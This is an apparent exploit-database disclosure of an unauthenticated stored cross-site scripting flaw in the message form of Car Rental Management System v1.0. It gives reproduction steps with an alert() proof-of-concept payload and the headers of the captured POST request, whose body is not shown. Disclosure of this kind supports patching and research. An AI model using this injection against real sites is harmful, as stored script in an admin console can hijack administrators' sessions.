# Exploit Title: Car Rental Management System v1.0 - Persistent Cross-Site Scripting (Unauthenticated)  
# Exploit Author: Adeeb Shah (@hyd3sec)  
# Date: August 3, 2020  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4  
# Vulnerability Details  
# Description: A persistent cross-site scripting vulnerability exists within the 'message' parameter in the message admin function.  
# This example allows an unauthenticated user to inject javascript code as a persistent XSS attack which is persistent and will be triggered by any admin that logs into the admin console.  
1. Navigate to http://HOST/car-Rental-syatem-PHP-MYSQL-master/message_admin.php (message_admin.php page)  
2. In message form enter <script>alert("XSS")</script>  
3. Click Send Message  
4. When an admin logs into the admin console now, the XSS will be triggered  
POST /car-Rental-syatem-PHP-MYSQL-master/message_admin.php HTTP/1.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 77  
Connection: close  
Cookie: PHPSESSID=17icjb6fd26q9gm1ohj9c9ht5i  
Upgrade-Insecure-Requests: 1